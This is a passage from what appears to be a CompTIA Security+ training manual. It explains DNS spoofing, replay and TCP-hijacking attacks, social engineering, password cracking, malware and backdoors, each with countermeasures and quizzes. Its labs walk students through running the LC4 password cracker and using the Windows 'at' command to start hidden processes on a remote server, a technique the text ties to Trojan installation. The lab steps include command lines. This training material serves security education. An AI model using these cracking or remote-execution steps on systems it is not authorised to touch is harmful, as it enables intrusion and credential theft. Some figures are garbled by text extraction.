The attacker compromises the victim organizations Web server and changes a hostname-to-IP address mapping. When users request the hostname, they are directed to the hackers server, rather than the authentic one. Using IP spoofing techniques, the attackers DNS server instead of the legitimate DNS server answers lookup requests from users. Again, the hacker can direct user lookups to the server of his or her choice instead of to the authentic server (also called DNS hijacking). When the victim organizations DNS server requests lookups from authoritative servers, the attacker poisons the DNS servers cache of hostname-to-IP address mappings by sending false replies. The organizations DNS server stores the invalid hostname-to-IP address mapping and serves it to clients when they request a resolution. All three attacks can cause serious security problems, such as redirecting clients to wrong Internet sites or routing e-mail to non-authorized mail servers. Countermeasures To prevent DNS spoofing: Ensure that your DNS software is the latest version, with the most recent security patches installed. Enable auditing on all DNS servers. Secure the DNS cache against pollution. Deploy anti-IP address spoofing measures. Do it!
C-2:
Securing the DNS cache against pollution Heres why
Heres how
Tell students the default configuration of Microsoft DNS server allows data from malicious or incorrectly configured servers to be cached in the DNS server. This procedure sets filters in place to protect the cache from DNS spoofing.
1 Click Start Choose Administrative Tools, DNS 2 Right-click the server name Choose Properties 3 Activate the Advanced tab 4 Verify that Secure cache against pollution is checked 5 Click Cancel 6 Close the dnsmgmt window
To filter for bogus cache instructions from unauthorized servers. To open the dnsmgmt window.
In the left window pane.
324
Do it!
C-3:
Review of spoof attacks

1 What method is used on LANs to map a hosts IP address with its physical address?
A
ARP MAC DNS SYN
B C D
2 IP address attacks spoof the __________________________ of the trusted host to send its packets to the victim.
source IP address
3 Web spoofing is considered a ___________ attack when the attacker places himself between the victim and the Web server that the victim wants to visit. A B
C
Denial of service SYN Man-in-the-middle DDoS
4 IP address spoofing attacks flood the trusted host with ______________________.

SYN packets
5 When can DNS spoofing be implemented? (Choose all that apply.)

A
The attacker compromises the victims DNS server and changes a hostnameto-IP address mapping The attacker rewrites the URLs embedded in legitimate Web pages to include the attackers Web server The attackers DNS server instead of a legitimate DNS server answers lookup requests from users The attacker rewrites the content of a Web page to make the victim believe some false information
B
C
325
Topic D: Replays
# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Replay
1.4
Replay attacks
Explanation Replay attacks involve listening to and repeating messages from a legitimate user in order to impersonate the user and gain access to systems. To implement a replay attack, the attacker: 1 Uses a sniffer program or device to read and capture packets passed between two hosts on the network. Sniffers work by placing the machines network interface into promiscuous mode, meaning that it listens to all packet activity on the network. 2 Filters the data and extracts the authentication transaction, typically an encrypted username and password, digital signature or encryption key. 3 Does not attempt to decrypt the transaction, but instead replays the transaction in order to gain access to a secured resource. Actually, replay attacks are more challenging than just recording and replaying information. To perform such an attack, the attacker must accurately guess the TCP sequence numbers. The attacker can accomplish this by using a script or utility that automatically makes guesses until the correct sequence is determined.
Web-based replays
A Web application is vulnerable to a replay attack if a users authentication tokens (nonencrypted session identifier in URL, unsecured cookie, and so on) are captured or intercepted by an attacker. By simply sniffing an HTTP request of an active session or capturing a desktop users cookie files, a replay attack can be very easily performed. For example, by sniffing a URL that contains the session ID string, an attacker might be able to obtain or create service to that users account simply by pasting this URL back into his Web browser. The legitimate user might not need to be logged on to the application at the time of the replay attack.
Other replays
Biometric devices are also vulnerable to replay attacks. In Might of 2002, a Japanese researcher presented a study showing that biometric fingerprint readers can be fooled 80 percent of the time by a fake finger created with gelatin using fingerprints lifted from a drinking glass.
326
CompTIA Security+ Certification Countermeasures Secure authentication systems have an anti-replay feature that makes each packet unique. This ensures that even if authentication data is captured by an attacker, it cannot be retransmitted in order to gain access to systems. Web applications continue to be vulnerable to replay attacks. This is because assailants can gain access to user credentials via session IDs that are part of URLs stored in proxy server logs. To prevent this type of attack: Update software with the latest security patches For Web-based transactions, use SSL to encrypt sensitive data
Do it!
D-1:
Discussing replays

1 Describe the process to perform a replay attack.
1 The hacker uses a sniffer to capture packets passed between two hosts on the network. 2 The hacker extracts the username and password, digital signature, or encryption key. 3 The hacker replays the transaction to gain access to a secured resource.
2 A Web application is vulnerable to a replay attack if a users _______________ are captured or intercepted by an attacker.
authentication tokens
3 How can an administrator protect against replays?

Update software with the latest security patches and, for Web-based transactions, use SSL to encrypt sensitive data.
327
Topic E: TCP session hijacking

# 1.4 Objective Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk TCP/IP Hijacking
How TCP session hijacking works

Explanation To accomplish TCP session hijacking, an attacker uses techniques such as ARP cache poisoning to make the victim believe that they connected to a trusted host, when in fact the victim is communicating with the attacker. A well-known tool for this purpose is Hunt, a free Linux tool that can monitor traffic on an Ethernet segment. With this tool, an attacker can then hijack TCP sessions by poisoning the victims ARP cache. To launch a TCP hijacking, the attacker is on the same Ethernet segment as the victim. The attacker runs Hunt (which acts as a sniffer by placing the attackers NIC in promiscuous mode) and waits for the victim to log on to the target server with his or her username and password. This way, the attacker can gain someone elses username and password and deceive normal authentication systems. When Hunt sees that the TCP connection has been established, it displays the connection to the attackers console and sniffs the victims keystrokes as they are transmitted to the target host. The attacker can take over the session by choosing the arp/simple attack option from within Hunt. In this case, Hunt sends three ARP packets, which cause the victims IP address to be bound to the attackers MAC address. Now, any packets destined for the victims IP address are sent to the attackers NIC. Hunt verifies the binding worked by sending a ping packet to the target host. If the target sends its response to the attackers MAC address, then the attack is effective. Now the attacker can type commands and use the victims TCP connection at will. The attack has the same effect as if the victim logged on to a server using telnet, and walked away from the terminal, thereby allowing the attacker to sit down and take control of the session. When the attackers are done using the TCP session, they have the option of terminating it or resynchronizing with the victims MAC address. Countermeasures Use IPSec to encrypt and secure communications.
328
Do it!
E-1:
Reviewing attacks

Match the following attacks with their definitions: ARP poisoning DNS spoofing IP address spoofing Ping of Death TCP session hijacking DDoS DoS Man-in-the-Middle Replay MAC attack
Man-in-the-middle
1 Attacker intercepts communications between two computers with intent of retransmitting capture data. 2 Attacker intercepts communications between two computers and acts as relay to access confidential data. 3 Attacker takes over the victims IP address by corrupting the ARP caches of directly connected machines. 4 Attacker consumes network bandwidth and computer resources to disable system. 5 Attacker sends very large ICMP packets that are too large for receivers buffer when reassembled. 6 Attacker creates an IP address with a forged source address. 7 Attacker intercepts a query to a DNS server and replies with bogus information. 8 Attacker uses hundreds or thousands of hosts on Internet to flood a victim with requests or deprive it of its resources. 9 Attacker hijacks TCP session to access network resources using identity of trusted host.
Replay
ARP poisoning
DoS
Ping of Death
IP address spoofing
DNS spoofing
DDoS
TCP session hijacking
329
Topic F: Social engineering

# 1.4 Objective Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Social Engineering 5.1 Understand the application of the following concepts of physical security Social Engineering
Real world threats

Explanation Social engineering is the equivalent of hacking vulnerabilities in computer systems to gain accessexcept it occurs in the world of people. Social engineering exploits trust in the real world between people to gain information that attackers can then use to gain access to computer systems. These trust exploits usually, though not always, involve a verbal trick or a believable lie. Goals of social engineering techniques include fraud, network intrusion, industrial espionage, identity theft, or a desire to disrupt a system or network. Targets for social engineering techniques tend to be larger organizations where it is common for employees who have never actually met to have communications and those that have information desired by attackers: industrial/military secrets, personal information about targeted individuals, and resources such as long-distance or network access. Social engineering techniques are often used when the attacker cannot find a way to penetrate the victims systems using other means. For example, when a strong perimeter security and encryption foil an attackers efforts to penetrate the network, social engineering might be the only avenue left. A slip of words is all the attacker needs to gain access to your well-defended systems.
330
Dumpster diving
Digging useful information out of an organizations trash bin is another form of attack, one that makes use of the implicit trust that people have that once something is in the trash, its gone forever. Experience shows that this is a very bad assumption, as dumpster diving is an incredible source of information for those who need to penetrate an organization in order to learn its secrets. The following table lists the useful information that can be obtained from trash bins:
Item Internal phone directories Description Provide names and numbers of people to target and impersonatemany usernames are based on legal names. Provide information about people who are in positions of authority within the organization. Indicate how secure (or insecure) the company really is. Identify which employees are out of town at a particular time. Provide all sorts of useful information; for example, hard drives might be restored. Include the exact information that attackers might seek, including the IP addresses of key assets, network topologies, locations of firewalls and intrusion detection systems, operating systems, applications in use, and more.
Organizational charts
Policy manuals Calendars Outdated hardware
System manuals, network diagrams, and other sources of technical information
Online attacks
Online attacks use chat and e-mail venues to exploit trust relationships. Similar to the Trojan attacks, attackers might try to induce their victims to execute a piece of code by convincing them that they need it (You have an IRC virus, and you have to run this program to remove itotherwise youll be banned from this group) or that its interesting (a game, for example). Most users are more aware of hackers when they are online, and are careful about divulging information in chat sessions and e-mail. If a hacker can manage to get a small program installed on a users machine, he might be able to trick the user into reentering a username and password into a pop-up window. Social engineering countermeasures There are a number of steps that organizations can take to protect themselves against social-engineering attacks. At the heart of all of these countermeasures is a solid organizational policy that dictates expected behaviors and communicates security needs to every person in the company. 1 Take proper care of trash and other discarded items. For all types of sensitive information on paper, use a paper shredder or locked recycle box instead of a trash can. Ensure that all magnetic media is bulk erased before it is discarded. Keep trash dumpsters in secured areas so that no one has access to their contents.
Attacks and malicious code 2 Ensure that all system users have periodic training about network security.
331
Make employees aware of social engineering scams and how they work. Inform users about your organizations password policy (for example, never give your password out to anybody at all, by any means at all). Give recognition to people who have avoided making mistakes or caught real mistakes in a situation that might have been a social-engineering attack. Ensure people know what to do in the event they spot a social-engineering attack. Do it!
F-1:
Discussing social engineering

1 Which of the following are the best ways to protect your organization from revealing sensitive information to dumpster divers?
A
Use a paper shredder or locked recycle box Teach employees to construct strong passwords Add a firewall Keep trash dumpsters in secured areas
B C
D
2 How can you secure system users from social attacks?

Make employees aware of social engineering scams and how they work Inform users about your organizations password policy Give recognition to people who have avoided making mistakes or caught real mistakes in
a situation that might have been a social-engineering attack
Ensure people know what to do in the event they spot a social-engineering attack
332
Topic G: Attacks against encrypted data

# 1.4 Objective Understand the concept and significance of auditing, logging and system scanning Weak Keys Mathematical Birthday Password Guessing Brute Force Dictionary
Encryption
Explanation Encryption is a method used to encode a plaintext file so only the intended recipient might read the original contents. This is usually accomplished using a complex algorithm and a key; the two are used to encode the original, readable version into an encrypted file and then decode the encrypted file back into its original form.
Weak keys
Weak keys are secret keys used in encryption that are easily cracked. Their vulnerability might be due to weak algorithms or keys that are too simple. For example, as computer processing capabilities increased, encryption keys have grown in size and complexity from 40 and 56 bits to 128 and even 256 bits. Hackers will continue to try to break encryption standards. The best practice is to use the strongest encryption standards and algorithms available, along with strong keys.
Mathematical attacks
A mathematical attack on a cryptographic algorithm uses the mathematical properties of the algorithm to decrypt data or discover its secret keys. This is done by using computations, which is a much faster method than guessing. The process of creating mathematical attacks on cryptographic systems is called cryptanalysis, which is traditionally broken into three categories, depending on the type of information available to the analyst. The categories are listed in order of increasing advantage to the analyst. Strong algorithms are expected to be able to withstand even chosen plaintext attacks. Cyphertext-only analysis The analyst has only the encrypted form of the data and no information about its cleartext (pre-encrypted) content. Known plaintext attack The analyst has available some number of messages in both unencrypted and encrypted form. Chosen plaintext attack The analyst has the ability to cause any message they wish to be encrypted.
333
Birthday attack
A birthday attack refers to a class of brute-force mathematical attacks that exploits the mathematical weaknesses of hash algorithms and one-way hash functions. It gets its name from the surprising fact that the probability that two or more people in a group of 23 share the same birthday is greater than fifty percent. You would need about 183 people in the same room to get a 50-50 chance a person shares the same birthday as you. The difference is that in the first case, two people share any of 365 possible birthdays. In the second case, youre looking for two people that share a single predefined birthday. This effect is called a birthday paradox. The birthday attack is one of the most significant attacks against the integrity of digital signature schemes. Heres the theory behind the birthday attack: Take some function (for example, a hash function) and supply it with a random input repeatedly. If the function returns one of k equally likely values, then by repeatedly evaluating the function for different inputs, statistically we expect to obtain the same output after about 1.2*k1/2 inputs. For the birthday paradox, replace k with 365. Birthday attacks are often used to find collisions (two inputs that result in the same hash value) of hash functions and are useful because they reveal mathematical weaknesses that can be used to compromise the hash. This is a much, much faster approach (compare 183 to 23 in the earlier birthday example) compared to the brute force technique of trying every possible combination.
Password guessing
Password guessing is another attack that seeks to circumvent normal authentication systems by guessing the victims password. This can actually be a trivial operation in some cases. For example, Microsoft Windows operating system stores username and password information in a SAM file located in the system directory. If attackers can gain access to the SAM file, they can immediately determine the user accounts (logon IDs) configured on the machine in question, and can then use brute force or dictionary password guessing tools on it to determine the users passwords. This can take some time if the user has selected a strong password, but can take substantially less time if the user has selected a common English word that can be determined by using a dictionary attack. One well-known commercial tool for assessing user passwords is called L0phtCrack after the hacker group named L0pht. (L0pht is now part of the security firm @stake.) This tool has a number of features, including the ability to conduct the brute force and dictionary attacks on Windows passwords outlined below.
334
CompTIA Security+ Certification Brute force The brute force approach to password guessing generates every possible combination of keystrokes that could be included in a password, and passes each possible combination one by one through the password hash function in order to crack the victims password. For example, a hacker attempting to crack a five-letter password of all uppercase letters might try AAAAA, BAAAA, CAAAA, and so on until the victims password is discovered. The brute force approach is effective compared to the dictionary attack, because it can crack any password, regardless of whether or not it is an English word that could be vulnerable to the dictionary attack. A brute force attack is computationally very intensive, and can therefore take some time to complete. For example, an 8-character password that uses only uppercase letters would require 826 or 302,231,454,903,657,293,676,544 possible combinations. If the password could use lowercase and numeric characters as well as uppercase ones, then the number of possible combinations jumps up to 8(26+26+10) or 862 combinations, which is a much higher number and would therefore take much longer to run through all possible combinations. Of course, the attackers could get lucky. If they stumble across the victims password early on, the time required to crack the password could be dramatically shorter, as would be the case if the victims password is BAAAA. Dictionary The dictionary approach to password cracking uses a predetermined list of words, typically normal English words and some variations, as input to the password hash. A dictionary password-cracking tool resolves the hash for each word in its list and then compares the hash against the users password hash, one by one. When the two match, then the password has been cracked. The dictionary attack only works against poorly chosen passwords. For this reason, its important that organizations put in place a policy that dictates users choose strong passwords that are not susceptible to this type of attack. Strong passwords are generally at least eight characters and use a mixture of uppercase, lowercase, numeric, and special characters. It is unlikely that an attackers word list includes this type of password, although poorly chosen passwords that meet the above criteria might still be in a hackers word list. The word p@55w0rd (password, spelled using the well-known hacker style) would be a bad choice for a password because it might be included in an attackers word list.
335
G-1:
Decrypting encrypted passwords Heres why

(Follow Instructors directions.) LC4 is the premier password-cracking tool. The download for LC4 is provided at net-security.org/software.php?id=17.
Heres how
1 Download the LC4 software to

C:\Security
2 Install the program 3 Click Start and choose All Programs, LC4, LC4 4 Click Trial Click Next 5 In the Get Encrypted Passwords window, verify that Retrieve from the local machine is selected Click Next 6 In the Choose Auditing Method window, select Strong
Password Audit
(Follow the Instructors directions.) To open the LC4 Trial Version window.
To open the LC4 Wizard. To choose the program settings.
LC4 has the capability of doing a brute force attack on passwords, which will find all passwords given enough time. The trial version, however, does not do the brute force attack, so it finds only the most vulnerable passwords.
Click Next 7 In the Pick Reporting Style window, select all options Click Next Click Finish 8 Close the LC4 program window
To begin auditing. LC4 will successfully decode the simpler passwords on your system.
336
Do it!
G-2:
Discussing attacks against encrypted data

1 Weak keys are secret keys used in encryption that exhibit a poor level of encryption. True or false?
True
2 The brute force approach to password guessing generates every possible combination of keystrokes that could be included in a password. True or false?
True
3 What type of attack will use properties of the cryptographic algorithm to discover its secret keys? A
B
Birthday attack Mathematical attack Password guessing All of the above
C D
4 How does the dictionary attack succeed in cracking a password?

It resolves the hash for each word in its list of English words, and then compares the hash against the users password hash. When the two match, the password is cracked.
337
Topic H: Software exploitation

# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Back Door Software Exploitation 1.5 Recognize the following types of malicious code and specify the appropriate actions to take to mitigate vulnerability and risk Viruses Trojan Horses Logic Bombs Worms 2.5 Recognize and understand the administration of the following file transfer protocols and concepts Vulnerabilities 8.3 Naming Conventions
1.4
Vulnerabilities in software
Explanation The term exploit is often used to mean any type of attack on a computer system, but software exploitation in the true sense means a penetration of security through vulnerabilities in software. This term casts a wide net, but generally applies to all tools and tricks that take advantage of vulnerabilities in software, whether logic errors or buffer overflows. The majority of successful attacks which use software exploits take advantage of wellknown vulnerabilities, such as ones that are publicly known, and ones for which patches and fixes are readily available from their vendors, usually by download over the Internet. An excellent example of this is the wave of worms that exploited Microsofts IIS Server in the summer of 2001. Code Red, Nimda, and Code Red II used, and continue to successfully use, vulnerabilities that have received national press and for which fixes have been available for some time now. These worms have severely impacted the Internet by congesting links with attack traffic and crashing Internet routers, and the worms have severely impacted the businesses that have been hit by them. This points to a continued pattern of indifference to security issues on the part of system administrators, according to a study by Gartner Research in Might of 2002.
Ask students how wellknown vulnerabilities remain a problem if a fix is developed.
338
CompTIA Security+ Certification As software is tested by industry experts to assess its level of security and vulnerabilities are identified, the vendor is notified and given time to address the issue before the public is made aware. In this way, users of the product are given an opportunity to protect their systems with vendor-provided fixes and patches before attack tools are generated that can be operated by those with script kiddie-level skills.
Buffer overflows
Buffer overflows is a very common type of vulnerability and are frequently exploited on the Internet to gain access to systems. This type of attack works in the following manner. Whenever software accepts any type of data from a user or another application, it allocates memory for that data. If the data that is passed to the software is too large to fit into the allocated memory (the buffer), the data could overwrite areas of memory reserved for other processes, including the stack. What results is a buffer overflow, which can have a variety of consequences including application crashes, operating system crashes, or no effect at allor it could result in a situation in which the attacker can cause his own code to be executed on the system. In this case, the attackers buffer overflow could give the attacker access to the system. Countermeasures The key to stopping software exploits against your critical systems is to stay apprised of the latest security patches provided by your software vendors. Most vendors provide mailing lists for this purpose, so customers can be immediately aware of security issues associated with their products, as well as the fixes for those problems. Most security patches are readily available free of charge. Microsoft provides a number of free tools and services to Windows users in order for users of their products to stay abreast of the frequent security updates for their product. Perhaps the most accessible method, found at windowsupdate.microsoft.com, is an automated tool that can examine a Windows machine and identify the latest security and product updates needed for that particular machine. Other tools include the Microsoft Baseline Security Analyzer (MBSA) that identifies critical patches that have not been installed on Windows servers. For more information, go to www.microsoft.com/security.
Malicious software
Malicious software, or malware, is a catchall term for programs such as viruses, worms, Trojan horses, and backdoor programs that either have negative behaviors or are used by attackers to further their goals. The primary difference between the various types of malware is their means of spreading. The following table outlines the primary differences between worms, viruses, and Trojan horses; more precise explanations are given in each of the following sections:

Type Virus Worm Trojan horse Propagation Copies itself into other executable programs and scripts. Exploits vulnerabilities with the intent of propagating itself. Uses social engineering techniques to trick users into running the malwares executable. Examples Melissa Code Red
339
ILOVEYOU, Naked Wife, Anna Kournikova
Viruses
Viruses are self-replicating programs that spread by infecting other programs. Viruses copy themselves into other programs and change them (or their environments) so that, when the infected program is run, the virus is also executed and has the opportunity to spread the infection to other programs. The host program or executable can be any binary file, script, or code that has the opportunity to modify other programs. A virus can infect an executable binary, a Visual Basic script embedded in a text document or spreadsheet, or a script for IRC (Internet Relay Chat) clients such as Pirch or mIRC. Its important to remember that programs do not have to actually modify an executable itself to be categorized as viruses. Self-replicating programs that modify the behavior of the host program or its environment are also clearly viruses. For example, a virus might cause an e-mail client to mail a copy of the virus to every user in the clients address book without actually modifying the e-mail clients code. Types of viruses The number, variety, and frequency of new viruses are astounding. A visit to one of the many online virus databases reveals new viruses being discovered on a daily basis. The following table provides just a sampling of virus databases:
Product Network Associates (McAfee) Symantec Computer Associates Trend Micro URL http://vil.nai.com/VIL/default.asp http://securityresponse.symantec.com/avcenter/vinfodb.html www3.ca.com/virus/encyclopedia.asp www.antivirus.com/vinfo/virusencyclo/
340
CompTIA Security+ Certification The viruses can be categorized according to type. The following table lists the predominant virus types:
Type Boot sector Description Spread by infecting floppy or hard disk boot sectors; when an infected disk is booted, the virus is loaded into memory and attempts to infect the hard disk and all floppy disks inserted into the computer. A class called parasitic viruses because they must infect other programs; file infectors copy themselves into other programs. When an infected file is executed, the virus is loaded into memory and tries to infect other executables. File types commonly infected include: *.exe, *.drv, *.dll, *.bin, *.ovl, *.sys, *.com. Propagated by using both boot sector and file infector methods. Currently accounting for the vast majority of viruses, macro viruses are application specific as opposed to OS specific and propagate very rapidly via e-mail. Many macro viruses are Visual Basic scripts that exploit commonly used Microsoft applications such as Word, Excel, and Outlook. Instead of modifying an existing program, the companion virus uses the DOS 8.3 naming system to disguise itself as a program with the same name but different extension. For example, a virus might name itself solitaire.com to emulate the solitaire.exe program. The .com file executes before an .exe file of the same name. The virus then runs the real program so it appears as if everything is normal. Changes or mutates as it copies itself to other files or programs. The goal is to make it difficult to detect and remove the virus. Similar to polymorphic, but recompiles itself into a new form, so the code keeps changing from generation to generation.
File infector
Multipartite Macro viruses
Companion
Polymorphic Metamorphic
Propagation techniques Antivirus software and online scanning services have become more commonplace, so viruses must spread quickly if they are to spread at all. To accomplish this, viruses combine mass mailing techniques (sending copies of itself to all recipients in the infected hosts address book) with file infectors and worm techniques. Mass mailing techniques allow each instance of the virus to infect potentially hundreds of hosts. The following table outlines some of the methods that virus writers are using to spread their viruses:

Item SKA Melissa Babylonia LoveLetter MTX Nimda Sobig Jitux.A Info January 1999 March 1999 December 1999 Might 2000 August 2000 September 2001 January 2003 December 2003 Description Single mailer. Mass mailer targeting 50 recipients in a single activation. Mass mailer using plug-in techniques.
341
Mass mailer targeting all recipients in the victims address book, in multiple activations. Mass mailer incorporating file infector, sharing network, and backdoor features. Mass mailer, also incorporating file infector, sharing network, backdoor process, and IIS infector methods. Spread through built-in SMTP client and local Windows network shares Spread through MSN Messenger
The major trend in viruses is that virus writers are adapting to more fully exploit the Internets functionality. Boot sector viruses, previously the most prevalent virus type, have been supplanted by worms and macro viruses that take advantage of the increasingly interconnected computing environments. Instead of slowly infecting machines as floppy disks are swapped and shared, viruses can now spread virulently enough to have a global impact in a matter of days or weeks via the Internet. Costs Viruses are incredibly damaging and costly. Some viruses carry a payload that is designed to erase files, format disks, or exhibit other undesired symptoms. Even viruses that do not have these qualities have extremely negative consequences. This is because viruses typically have consequences unintended by the virus writer. For obvious reasons, virus writers do not perform compatibility testing. When the virus spreads into systems with differing software packages or OS flavors, it can have unforeseen impacts which can range from slow system response times to causing the infected system to crash. When a virus becomes widespread, it causes very large productivity losses in businesses around the world as computer users struggle with their infected machines. Widespread infections can also result in what is effectively a denial-of-service (DoS) attack on mail servers, which can be brought to a grinding halt as they are swamped with a huge volume of virus-generated messages. Additional costs are incurred as system administrators have to spend time battling the infection and removing it from computers. Virus removal can often be a difficult and time-consuming process. The cleanup process itself can inadvertently cause additional damage to the computer system because administrators often have to replace important system files that are infected by the virus. Businesses can incur a significant cost in terms of goodwill and reputation if they are infected with a virus.
342
CompTIA Security+ Certification Countermeasures A number of vendors provide enterprise virus protection solutions that can effectively filter known viruses, Trojan horses, and worms. These solutions include desktop antivirus programs, virus filters for e-mail servers, and network appliances that detect and remove viruses. Best practices dictate that large organizations need a multi-layered security approach that defends against malware from all points of entry to the network. This means that no single solution is enough: virus solutions at network gateways, desktops, and on e-mail servers (both internally and on network Demilitarized Zones) are needed to best protect the enterprises productivity and information assets.
Item Description Install products from multiple vendors. Some suppliers offer a fix for a given new virus before others, so by using multiple products, your organization can have the fix for new viruses sooner. Keep virus signature databases up to date on both desktop computers and servers. Use automated systems to automatically download and install the latest signatures. Policies and procedures Software updates and patches User education Define an organizational policy that clearly states proper use of e-mail and network resources, and ensures that computer users receive training on safe computing habits. Keep machines, and especially servers, up to date with security patches to ensure their systems are not vulnerable to well-known exploits. Instruct users to never download any file from an unknown source. If a program is double-clicked even once, even for a moment to check it out, the computer can be infected. Caution users about executable files sent to them even from friends and co-workers. In general, there is little need to send executables via e-mail. Users should always check with the source before running the executable. Configure servers Many e-mail servers can automatically disable forwarding of dangerous file types by e-mail to prevent the spread of viruses and other malware.
Stress the importance of virus database update subscriptions so new software does not have to be purchased when an outbreak occurs.
Antivirus products
Trojan horses
According to legend, the ancient Greeks tricked the Trojans into admitting the Greek army by offering them a wooden statue of a horse as a gift. Once the Trojans had pulled the horse behind the citys fortifications, the Greek soldiers who were stowed away inside were able to gain access and conquer the city of Troy. Likewise, the makers of Trojan horse programs gain access to their victims computers by tricking them into running their malware by presenting the program as something useful or beneficial. The candy used to induce users to run the Trojan horse can include anything someone might find interesting: games, pictures, MP3s, screen savers, or pornography (one famous Trojan was entitled Naked Wife). When the unwitting user runs the program, it can wreak havoc with any number of methods including:
Attacks and malicious code Sending copies of itself to all recipients in the users address book Deleting or modifying files Installing backdoor/remote control programs
343
Most Trojan horses install themselves silently; users often dont realize theyve been infected until they receive an e-mail from someone saying an e-mail they have received from the user was infected with a Trojan. In the meantime, the attacker might have already collected password files or uploaded additional tools to use the victims computers for DDoS attacks. Propagation techniques Many viruses are categorized as Trojan horses because they use some sort of social engineering to induce the victim into running the attackers program. Most modern email clients do not allow programs contained in e-mail messages to execute automatically, viruses that spread by e-mail cannot multiply without user intervention. One feature of the Windows operating system that can be used to trick users into running Trojan horses is the Hide file extensions of known file types option. By default, Microsoft Windows hides file extensions, which can cause files to appear to be a different file type than they actually are. If file name extensions are hidden, then the file Reunion.jpg.exe will look like Reunion.jpg. This can trick users into executing Trojan horses. Countermeasures Implement a clear organizational policy regarding e-mail attachments and train users regarding the policy. Install antivirus programs on each client and maintain current signature files. Do it!
H-1:
Discussing viruses and Trojan horses

1 Describe a macro virus.
These Visual Basic scripts exploit Microsoft applications.
2 What is a polymorphic virus? A

B
A virus that recompiles itself into a new form from generation to generation. A virus that changes itself as it copies to other files or programs. A virus that spreads by infecting the hard boot sector or floppy disks. A virus that presents itself as a useful or beneficial program in order to trick the user into executing it.
C D
3 Describe how a Trojan horse is propagated.

It usually is attached to an e-mail message. Once run, it can use the users address book to send copies of itself to other marks.
344
Backdoor
Explanation A backdoor is a piece of malicious software, or malware, that allows a malevolent user to gain remote access without the knowledge or permission of its owner. Also known as remote access Trojans, these programs allow an attacker to connect to the compromised computer locally or over the Internet and, depending on the type of backdoor installed, issue a wide variety of commands. Although some machines compromised with backdoor programs are used to store files and applications such as hacks and exploits for later use, they can also be used as handlers in a distributed denial-of-service attack. Trojan.VirtualRoot Backdoor programs can be installed on victim machines by any number of methods: Trojans or other social engineering methods, worms, viruses, or manually by exploiting vulnerabilities and uploading the remote control software. One recent threat using a backdoor is the Code Red II worm, which exploits vulnerability in Microsoft IIS servers to gain entry, install remote access software called Trojan.VirtualRoot, and continue to spread to other machines. This type of attack is typical of the recent trend of blended threats. Once the Trojan.VirtualRoot backdoor has been installed, the server might be controlled remotely. Back Orifice 2000 One of the more famous remote access control/backdoor programs is Back Orifice 2000 (BO2K), mockingly named after Microsofts Back Office 2000 product suite. Produced by a hacker group called Cult of the Dead Cow (www.cultdeadcow.com), BO2K is offered as a remote administration tool, although its lightweight and unobtrusive nature allow it to be surreptitiously installed on a victims computer without his or her knowledge. After the BO2K server (only 40K) is configured, as shown in Exhibit 3-8, and installed on the compromised system, it immediately buries itself into the Windows system directory and runs itself silently every time the computer is rebooted.
Exhibit 3-8: BO 2K configuration screen
345
A remote attacker can then connect to the compromised machine by using the BO2K client GUI and issue any number of commands. Plug-ins are available for BO2K that allow the hacker to view the compromised computers desktop and move the mouse pointer. It is even possible for the remote attacker to activate the victims video camera and microphone, thereby monitoring everything, and everyone, in front of the computer. BO2K runs on most Windows systems and is currently being used on other operating systems. For more information about the tool, see the following Web site:
http://sourceforge.net/projects/bo2k/
NetBus NetBus is an earlier remote control/backdoor tool that has similar functionality to that of BO2K. Like other such programs, NetBus is often the payload of a Trojan horse or worm that gives hackers the ability to connect to the compromised machine over the Internet and issue a variety of commands. Some of the commands seem to be included in the feature set more for their ability to impress the unassuming victim than to be useful. A list of NetBus commands is shown in Exhibit 3-9.
Exhibit 3-9: NetBus commands Countermeasures

.
Backdoor and remote access programs such as BO2K and NetBus are easily detected and eliminated by antivirus software and are otherwise thwarted by using the same mechanisms as used against Trojan horses and viruses. For this reason, it is important to implement an effective virus screening solution on all servers and desktop computers, as well as to educate computer users about the danger of e-mailed viruses and Trojan horses. In addition to these regimens, critical e-commerce servers should be equipped with host-based intrusion detection systems to block attacks that result in the installation of backdoors. Backdoor traffic can also be spotted by network-based intrusion detection systems, although some backdoors encrypt their traffic to bypass network IDS signature detection.
346
Do it!
H-2:
Using the AT command to start system processes Heres why

The Windows operating system allows you to execute a program on a remote system. Using the at command, you can schedule an executable to run on a remote system at a specific time. This is a remote access Trojan and is commonly used to install Trojan horses on a remote system.
Heres how
For this activity, students will work in pairs. Each partnership will use two machines, Server-X and Server-Y. Instruct students to substitute their servers hostname for Server-X and their partners server hostname for Server-Y.
1 On Server-X, log in as Administrator
2 Press c + a + d Click Task Manager Activate the Processes tab 3 On Server-Y, log in as Administrator 4 Open a command prompt window 5 Enter the following command:
net time \\server-x To know the current time for Server-X so you can schedule the execution of a program. To open the Windows Task Manager. To view the current processes. Look for notepad.exe. You should not see it.
The value for <time> should be 3 minutes after the current time for Server-X.
6 Enter the following command:
Where <time> is 3 minutes after the current time.
at \\server-x <time> /interactive "notepad.exe" The command at \\server-x 3:49p /interactive notepad.exe, for example, will launch notepad within an interactive window at 3:49 PM on Server-X.
7 Enter the following command:

at \\server-x <time> "notepad.exe" The command at \\server-x 3:49p notepad.exe, for example, will launch notepad in a background process at 3:49 PM on Server-X. Omitting the /interactive switch launches a process that is hidden from your partner.
Attacks and malicious code 8 At Server-X , after the time specified in the command lapses, check Windows Task Manager and view the processes
347
9 Check the Server-X desktop for the Notepad application 10 Close Task Manager and Notepad on Server-X and the command window on Server-Y
You'll see Notepad is running on the server.
348
Logic bombs
